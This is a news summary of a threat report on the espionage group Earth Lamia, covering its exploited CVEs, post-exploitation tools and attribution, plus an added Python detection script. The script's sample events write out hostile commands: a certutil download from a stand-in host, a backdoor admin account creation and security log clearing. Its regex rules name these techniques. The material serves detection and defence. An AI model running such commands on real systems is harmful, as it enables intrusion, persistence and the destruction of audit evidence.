Trend Micro has released an in-depth report detailing a China-nexus advanced persistent threat (APT) group known as Earth Lamia, which has been conducting targeted cyber espionage campaigns across Brazil, India, and Southeast Asia since at least 2023. The group has aggressively shifted focus across industries over time, moving from financial sectors to logistics, retail, and now to IT firms, academic institutions, and government organizations in 2025.
Earth Lamia primarily exploits SQL injection vulnerabilities in public-facing web applications to infiltrate networks. Using automated tools such as sqlmap, they gain remote access to SQL servers and often execute commands to create new admin accounts, notably the "sysadmin123" user, to facilitate data exfiltration.
In addition to SQL injection, the group exploits a range of known vulnerabilities, including:
- CVE-2017-9805: Apache Struts2 RCE
- CVE-2021-22205: GitLab RCE
- CVE-2024-9047: WordPress File Upload arbitrary access
- CVE-2024-27198, CVE-2024-27199: JetBrains TeamCity auth bypass and path traversal
- CVE-2024-51378, CVE-2024-51567: CyberPanel RCE
- CVE-2024-56145: Craft CMS RCE
- CVE-2025-31324: SAP NetWeaver unauthenticated file upload
These exploits enable Earth Lamia to establish initial access, after which they carry out extensive lateral movement within compromised environments.
Trend Micro observed Earth Lamia engaging in the following post-exploitation behaviors:
- Downloading tools via certutil.exe and powershell.exe
- Deploying webshells
- Performing privilege escalation using tools like GodPotato, JuicyPotato, and a customized tool named BypassBoss (a modified version of Sharp4PrinterNotifyPotato)
- Conducting internal reconnaissance using Fscan, Kscan, nltest.exe, and net.exe
- Creating persistent user accounts such as “helpdesk” with admin privileges
- Extracting credentials from LSASS, SAM, and SYSTEM hives
- Cleaning logs with wevtutil.exe
- Establishing covert channels using rakshasa and Stowaway
- Executing backdoors from known C2 frameworks including Vshell, Cobalt Strike, and Brute Ratel
- Using schtasks.exe to ensure persistence
Custom Tools and Stealth Enhancements
Earth Lamia is also known for modifying open-source tools to evade detection. The group strips out static strings, obfuscates essential metadata, and repackages tools as DLL files for DLL sideloading — often using legitimate binaries like AppLaunch.exe. In one case, this executable was used with arguments mimicking Mimikatz, suggesting attempts to extract credentials under the radar.
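As an added example (not code from the Trend Micro report or from any tool it names), the script below turns three of the behaviors described above into simple process-creation detections: SQL Server spawning a shell after SQL injection, the post-exploitation command list (certutil downloads, local admin account creation, wevtutil log clearing, schtasks persistence, nltest reconnaissance), and AppLaunch.exe being abused for DLL sideloading. The events, hostnames, paths and passwords are constructed; field names loosely follow Sysmon Event ID 1 but none of the lines come from a real host. The AppLaunch.exe path heuristic (a legitimate copy lives under the .NET Framework directory) and the `module::command` argument check are assumptions of this example, not findings from the report.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed; fields modelled on Sysmon EID 1)."""
    host: str
    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


# Command-line rules, named after the post-exploitation behaviors in the report.
CMDLINE_RULES = [
    ("certutil_download",   re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("powershell_download", re.compile(r"\bpowershell(?:\.exe)?\b.*\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I)),
    ("local_user_added",    re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("added_to_admins",     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("eventlog_cleared",    re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)),
    ("schtask_created",     re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.I)),
    ("domain_recon",        re.compile(r"\bnltest(?:\.exe)?\s+/(?:dclist|domain_trusts|dsgetdc)\b", re.I)),
]

# Assumed heuristic: a genuine AppLaunch.exe lives under the .NET Framework
# directory; a copy elsewhere, or one given Mimikatz-style "module::command"
# arguments, matches the sideloading pattern the report describes.
APPLAUNCH_DIR = re.compile(r"\\Microsoft\.NET\\Framework(?:64)?\\", re.I)
MODULE_SYNTAX = re.compile(r"\b\w+::\w+\b")

# SQL Server has no business launching shells: command execution obtained
# through SQL injection shows up as sqlservr.exe -> cmd/powershell/certutil.
SQL_CHILD_SHELLS = {"cmd.exe", "powershell.exe", "certutil.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event triggers (empty list if benign)."""
    hits = [name for name, rx in CMDLINE_RULES if rx.search(ev.cmdline)]
    if basename(ev.image) == "applaunch.exe" and (
        not APPLAUNCH_DIR.search(ev.image) or MODULE_SYNTAX.search(ev.cmdline)
    ):
        hits.append("applaunch_sideload")
    if basename(ev.parent_image) == "sqlservr.exe" and basename(ev.image) in SQL_CHILD_SHELLS:
        hits.append("sqlserver_spawned_shell")
    return hits


def scan(events: list[ProcEvent]) -> list[dict]:
    """Return one finding per event that triggered at least one rule."""
    findings = []
    for ev in events:
        rules = classify(ev)
        if rules:
            findings.append({"host": ev.host, "cmdline": ev.cmdline, "rules": rules})
    return findings


# Constructed sample telemetry: a web/database host and one workstation.
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    ProcEvent("web-01", SYS32 + r"\cmd.exe",
              r"cmd.exe /c certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Windows\Temp\a.txt",
              r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"),
    ProcEvent("web-01", SYS32 + r"\net.exe", "net user helpdesk P@ssw0rd! /add", SYS32 + r"\cmd.exe"),
    ProcEvent("web-01", SYS32 + r"\net.exe", "net localgroup administrators helpdesk /add", SYS32 + r"\cmd.exe"),
    ProcEvent("web-01", SYS32 + r"\schtasks.exe",
              r"schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc minute /mo 5", SYS32 + r"\cmd.exe"),
    ProcEvent("web-01", SYS32 + r"\nltest.exe", "nltest /dclist:", SYS32 + r"\cmd.exe"),
    ProcEvent("web-01", SYS32 + r"\wevtutil.exe", "wevtutil cl Security", SYS32 + r"\cmd.exe"),
    ProcEvent("ws-07", r"C:\Users\Public\AppLaunch.exe", "AppLaunch.exe", SYS32 + r"\cmd.exe"),
    # Benign controls: AppLaunch.exe from its real location, and a normal service host.
    ProcEvent("ws-07", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe", "AppLaunch.exe",
              SYS32 + r"\services.exe"),
    ProcEvent("ws-07", SYS32 + r"\svchost.exe", "svchost.exe -k netsvcs", SYS32 + r"\services.exe"),
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {', '.join(f['rules'])}  <-  {f['cmdline']}")
```

Run against the constructed events, seven of the nine are flagged and the two benign controls are not; the first event triggers both the certutil download rule and the SQL-Server-spawned-shell rule, which is exactly the chain the report describes (SQL injection, then tool download from the database host). In production the same rules belong in your EDR or SIEM query language rather than a script, and the account-name and path details should be tuned to the environment.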
A signature development of Earth Lamia is its proprietary PULSEPACK backdoor first spotted in August 2024. A new 2025 version comes with enhanced C2 communication capabilities.
The intrusion set REF0657, which has been observed targeting South Asia's financial sector, is believed to be the work of Earth Lamia. The tactics and tools used in these attacks, including the use of "GodPotato" (as Sophosx64.exe) and a Cobalt Strike loader (USERENV.dll) developed via the MemoryEvasion project, align closely with known Earth Lamia activity.
A report on a Mimic ransomware campaign (STAC6451) revealed overlaps with REF0657, suggesting possible Earth Lamia involvement. However, STAC6451 also included tactics atypical of Earth Lamia, suggesting that the campaign involved multiple intrusion sets. Earth Lamia has not previously been observed using ransomware, though it’s possible they collaborated with the Mimic campaign or independently targeted the same systems.
By January 2025, researchers linked an espionage campaign (CL-STA-0048) to both DragonRank, a Chinese APT group, and REF0657 (Earth Lamia). While Earth Lamia and DragonRank are currently tracked as separate entities, a definitive link between them has not been ruled out.
In May 2025, a broader set of China-nexus APT campaigns exploiting CVE-2025-31324 was reported. One campaign used the Cobalt Strike C&C domain sentinelones[.]com, tied to CL-STA-0048 and possibly Earth Lamia. Another IP address (103[.]30[.]76[.]206), attributed to UNC5174 in the same report, is believed by researchers with high confidence to actually be operated by Earth Lamia.
“The original attribution to UNC5174 is based on the fact that the attacks delivered a VShell stager called SNOWLIGHT. The stager has been reported to be used by UNC5174,” the researchers noted. “However, this may not be reliable because SNOWLIGHT is also one of the default stagers in the VShell framework. Anyone using the framework could generate the stager to load their VShell backdoor.”